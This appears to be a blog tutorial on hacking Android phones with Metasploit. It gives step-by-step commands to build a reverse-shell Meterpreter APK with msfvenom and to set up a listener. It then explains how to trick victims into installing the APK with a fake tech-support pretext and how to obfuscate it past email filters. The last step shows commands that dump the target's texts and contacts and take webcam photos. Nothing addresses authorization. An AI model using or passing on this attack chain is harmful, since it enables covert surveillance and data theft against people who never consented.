Welcome back, my budding hackers!
The growth of the mobile device market has been dramatic over the past 10 years. From its birth in 2007 with the advent of the Apple phone, mobile devices now comprise 52.3% of all web traffic in 2018. There are 4.5B mobile devices on the planet or about one for 2/3 of the world's population. Of these mobile devices, 87.9% use the Android operating system. With this market dominance of Android, it is fitting that we focus our mobile hacking upon this dominant operating system.
In this tutorial, we will be using Metasploit to exploit Android devices such as tablets and phones. As you will see, once we have exploited the Android device, we are capable of collecting the target's text messages, contact list, location and even turn on their webcam!
Step #1: Find Android Exploits
The first step is to search Metasploit for Android exploits.
There are numerous exploits within Metasploit for hacking Android. A quick search reveals the following exploits;
msf > search type:exploit platform:android
As you can see, there are at least 7 exploits for Android operating systems in Metasploit.
Step #2: Find Android Payloads
As you have seen in previous Metasploit Basics tutorials, Metasploit has numerous payloads and those payloads are specific to the operating system and exploit. If we want to exploit an Android system, then we will need an Android payload.
We can find Android specific payloads by searching;
msf > search type:payload platform:android
As you can see, there are numerous Android specific payloads including payload/android/meterpreter/reverse_tcp which we will be using here, but the others can also be used as well.
Step #3: Build an APK file
One of the easiest ways to exploit an Android system is to create an .apk (Android PacKage file) file and have the target install it on their Android phone or tablet. This is usually done through physical access to their phone or through social engineering ("Hello, this tech support. We have detected unusual activity on your phone and need to install a tech support app to monitor this activity..."etc).
As we learned here in Metasploit Basics, Part 9, we can use the msfvenom utility in Metasploit to create custom payloads. In this case, we will convert the payload/android/meterpreter/reverse_tcp into an Android .apk file.
To do so, enter the following command.
msf > msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 R > AndroidMalware.apk
For more on how to use msfvenom to create custom payloads, see my tutorial here.
Step #4: Set Up a Multi Handler Listener
Now that we have the .apk built with the Android payload embedded, we need to open a listener on our system to accept the connection from the AndroidMalware.apk when it is installed and executed. If you read Metasploit Basics, Part 12, we set up an .rc script to automatically start and open a listener to accept outside connections to our Metasploit. If you did so, you can now start it by entering
msf > resource handler_http.rc
If you don't have a listener script, you can start a listener by entering the following commands;
msf >use exploit/multi/handler
msf >set PAYLOAD android/meterpreter/reverse_tcp
msf >set LHOST 192.168.1.101
msf > set LPORT 6996
msf > exploit
You must make certain that the PAYLOAD, LPORT and LHOST are the same as you used in creating your .apk file in msfvenom.
Step # 5: Deliver the AndroidMalware.apk to the Target
The next step, of course, is to deliver the .apk file to the target's mobile device. If you have physical access to the device, simply install the AndroidMalware.apk. Otherwise, you will need to send it to the target via email or DropBox or other means. It's important to note that this file will likely be flagged by Gmail and other email services as malware. As a result, consider re-encoding the payload with OWASP-ZSC or other obfuscation software such as shellter or Veil-Evasion.
In addition, you might consider hosting the .apk on your own website and encourage people to download it.
Step #6: Exploiting the Target System
Once the target installs the .apk, we should get a meterpreter prompt like below. We can then enter the command sysinfo to verify we are on the Android device!
meterpreter > sysinfo
We can then enter help to see all the Android meterpreter commands.
meterpreter > help
Note that from the Android meterpreter we have unique options such as;
These commands give us the power to see just about anything the target is doing on this device as well as finding their location. This meterpreter is also capable of using some of the other standard meterpreter commands such as;
Step #7: Gathering Data from the Android Device
Let's start by getting the target's text messages
meterpreter > dump_sms
Now, let's get their contacts list.
meterpreter > dump_contacts
Finally, list try listing their web cams so that we can later snap pictures from them.
meterpreter > webcam_list
Now that we have the list of web cams on the device, we can use the meterpreter command webcam_snap followed by the number of the webcam to take pictures of the target from the back camera
meterpreter > webcam_snap 1
The world's most widely used hacking/pentesting platform, Metasploit, has capabilities to exploit just about any system including Android mobile devices. We can create a malicious .apk file and when the target installs the app, we can get almost totally unfettered access to their text messages, contacts and web cams!
Look for my new book, "Metasploit Basics for Hackers" coming out fall 2019!